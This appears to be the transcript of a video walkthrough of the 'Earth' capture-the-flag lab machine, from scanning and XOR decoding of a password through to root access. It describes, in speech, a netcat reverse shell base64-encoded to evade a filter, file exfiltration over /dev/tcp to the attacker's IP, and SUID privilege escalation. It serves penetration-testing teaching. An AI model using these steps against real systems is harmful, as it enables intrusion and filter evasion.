In this video, we will have a look at the walkthrough for the other vulnerable system called the Earth. The previous one that we actually saw was the Mercury. So let's start the system Earth. Penetration testing is best learned by actually doing it. I used to tell my students as well, okay, penetration testing is not theoretical. Okay, we can speak about some theory, but it needs to be done, performed. Okay, the hackers are doing it, right? We cannot just keep on learning a theory. It's like cooking. If you want to really learn cooking, you have to do it. Okay, making mistakes is a beautiful thing. Okay, you'll learn from the mistakes. Do it, make mistakes, learn from it, and get going. Similarly, if you want to ride a cycle, okay, at the beginning you will fall down. It's okay. Okay, nobody learns to ride a bicycle without falling down. Okay, so do it. Learn it by doing it. Okay, so we have got the Earth up and running. Let's come on to Kali Linux. ARP scan -L to actually tell me the IP address of the system. 192.168.1.3. Okay, do an nmap to find out, is this the actual system? No, it is not. Let's look at 9. Okay, so 2284, it looks like it is SV, SC on port 2280, port 43. Otherwise, it goes on scanning all the ports, okay, so which is going to take a lot of time. So this one, okay, SV is for version scan or service scan, and SC is for running the default scripts. Nmap has got its own a set of scripts on user share Nmap scripts. Okay, that is very much useful. In fact, Nmap can also become a vulnerability scanner. So in fact, there's a video on my channel, okay, which tells you or teaches you how to convert this Nmap into a vulnerability scanner using vulner script. Not a rocket science, simple. You can also try that. Now let's look at this. Let me copy this. Okay, let me copy this to copy this to a text editor. Yeah. Now we have got two domain server names, okay, DNS names. Okay, the alternative as well as we've got an terratest.earth.local and earth.local. It's always advisable to add this as a part of your etc host. Okay, mousepad etc host, edit. What is the IP? 192.168. 1.9. Okay. Local. Same thing, 192.168. 1.9. Terra test dot earth dot local. Control is to save it. Okay, now let's close this. Yeah, okay. Now we have 80 up and secure shell is also there. 80 HTTP is there, HTTPS is there. Let's open this up. Control Shift C. Let's secure messaging service. Send your messages to Earth. Messages. These are the messages, previous messages. Okay, let's note this thing down for now. Okay. Okay, these are the messages. Let's do a directory search. We are doing it on HTTP, terratest.earth.local. Let's see what's the output. 97% complete. Good. So we have got We have got admin login, Control Shift C for copying it. Let's paste it. Now what I'm going to do is I'm going to use HTTPS because 443 is also open. HTTPS. Let's see what this has got to give us. What we actually see here is the output when I do a directory search using the HTTPS. Okay, it's totally different from what I actually had when I did a directory search using the HTTP. So I'm not getting this admin. Okay, see, look at here, admin login. I don't get the admin login here. Whereas I get this robots.txt. Okay, it's a very important file, okay, for the penetration test to see what is allowed, what is disallowed. Okay, anyway, so let me also copy this. Control Shift C. Done. Okay. So let's get on to first admin. You are not logged in, please log in. So there's a user ID and login thing here. I don't know what the username is. Okay. Let's get on to robots.txt. Robots.txt. Okay. Robots.txt is something which I found only when I executed HTTPS. Okay. Let's use Terra test. Wow. So I have got disallow for anything that ends with ASP, all this. Okay, there's something called testing notes. Testing notes. The file extension is actually not given. Let's try it out. Remove this. Not found because I have not given an extension. .php. No. So txt is actually revealing me some information. Okay, using XOR encryption as an algorithm. Okay, should be safe as used in RSA. Earth has confirmed that they have received the send messages, which we had actually seen on their homepage. Test data.txt was used to test encryption. That means we know what the plain text is, what the text is basically. Okay, so that could be encrypted text that we actually saw. And test data.txt because we know what the algorithm is. It's XOR. Okay, we don't know what the output is. Okay, what the decrypted message is. So test data.txt should be the key. And Terra is used the username for the admin portal, which we were actually wondering what could be. Admin is usually something that we actually check. Okay, let me note it down. Okay, let's look at what is there in the test data.txt. Okay, there's something here. Okay, according to the radiometric dating estimation and other evidences, blah, blah, blah. I'm going to note it down because I'm going to use this as a key. Okay, now, let's go back to the browser. Now, let me open up this browser. Google online XOR decoder. Okay. A lot of things. Let's use md5decrypt.net. Okay. Input to the XOR. This is what they have received. This is what they have received. Okay. This is the message received. This is what something which I'll put. I agree to use the cookies. And the input type looks like hexadecimal. What is the key? This is the key, Teradata or test data, sorry. So the key is a plain text. Okay, output should be a text. Let's check it out. It is not. Okay. If I put the input as a hexadecimal and key type as text, I'm getting this one. Earth climate change bad for humans. Earth climate change bad for humans. Okay, so there's actually repeating. This could be the password. Okay, let's note it down. Earth climate change bad for humans. Okay, let's get on to the admin portal. Admin login. Terra. Okay, what is the password? Earth. Good. Okay, so welcome to Terra and your CLI command on Earth messaging machine. Who am I? Apache. What's my present working directory? Root. Do an ls. Okay. They've got bin boot where, because it's actually hosted using Apache, let's do a cd var. Okay. But I'm still on root. cd home. I'm still on root. Okay, there's something which is preventing. So I would do an cd home, do an ls to list down the hidden files using la, and do an present work directory. Now I've got something called as an earth, earth home. Okay. Okay. Let's try to establish an reverse listener onto the environment. Okay, I'll send it cat and see NLVP with the verbosity. Okay, listening to the port listener and port on 4444. Okay, I'm listening here. Let's get on to our site. I'll establish a reverse connectivity. Before that, I need to know what my Kali Linux address is. Kali IF config is 192.168.1.8. Okay. NCE bin bash on this particular 192.168.1.8 4444. Nothing is happening. Okay, that means that there is some sort of a security, in there. Yeah. So what I'm going to do is I'm going to convert this command. I'm going to decode using a base 64 just to cheat the Kali Linux system. So echo This is what the command is. I'll say echo this particular value. I'll say base 64, do a decoding, and then execute this as a bash. Now I have got a connectivity to my Apache. I want to get the bash from this. Okay, so what I'm going to do, I'm going to go to Google again. Okay, get bash on reverse shell Python command. Yeah, TTY shell. Okay, get TTY on reverse shell. Okay, copy this Python C. Okay, I'm not very good in remembering commands. Okay, Uncle Google is anywhere there for us. Python. Oops. A lazy guy. Huh? Nope. Did I copy something incorrectly? Python 3, yeah? It should be Python 3. Nope. Let's establish the reverse connectivity again. NLVP, go to the browser, just timed out, run the command. I've got the connectivity. Who am I? Okay, I've got the bash. Okay, now I want to find out the so the privilege escalation. Okay, I want to find out the the executables or the binaries, which I can do a privilege escalation. Okay, hyphen u is equal to s. Okay, hyphen type f2 slash dev slash. There's actually a command called reset root. Okay, this is on the target system reset root. Now I need to bring this particular file to my system to try out the commands. I'm opening another shell, other terminal, sudo su kali netcat nlvp t333 reset root. Okay. Now this is the file that I need to actually send it to my host system. It's listening. Now get on to the target system. I would say cat. Okay. To device TCP 192.168.1.8. That's what the IP address of this system, right? Yeah, 1.8. Okay. 3333. This is what the port that we are actually listening on to get this file. No such file or directory. Okay, it's not DEC. Huh. Cat root dev. Okay, not DEC, dev. TCP 192.168.1.8 3333. Good stuff. Okay, let's have a look. Okay, so we have got something here. Let's do an ls grep on reset. I have got the file here. Let's come to the bash. Strings, reset. Okay, no such file or directory because we are on home Kali. Okay, let's do a strings here. Now, what does it actually do? It is reset the triggers. The reset triggers are present, resetting the root to earth. Okay, resetting the root to earth. Okay, now let's try to execute this command. Okay. Checking if the reset triggers are present. Reset failed, all triggers are not present. Now there is actually a command called ltrace. Okay, ltrace is something which is not default with Kali. You need to download this. Okay, ltrace will trace the execution of the program to tell what exactly is there, what exactly is not there. Now it is trying to access this file. It's saying -1. That means this file is actually not there. We need to create this file on the target system. Okay, come to the bash, touch, create that file, create this file as well. We are going to create a third file also. No such file or directory. Did we make a mistake copying it? No. Anyway, let's try to run this command. Change. I'm making it as executable. Reset root. Reset failed. All triggers are not present. Let's again try to do an ltrace. Let's execute on the target system. Yeah. It says no such file or directory. Now, actually, what we have done is we did not give touch. We did not give a touch here. Okay, that's where. Okay. Now let's try to execute this command. Triggers are not present. So somewhere we are missing something. Let's check it out. So we have created everything there. Okay. So reset root. Okay, done. Okay, we should have been doing it on the target system, not on my system. Okay, so we have checked, tested the file. It has reset that to earth. Okay. Now we have the password now. It's not sudo root password EARTH. So we have actually logged on to the target system as a root and the password earth. Thanks for watching this video. Join us for CSPD training. Keep subscribed, keep yourself secure. Cheers then. Bye-bye.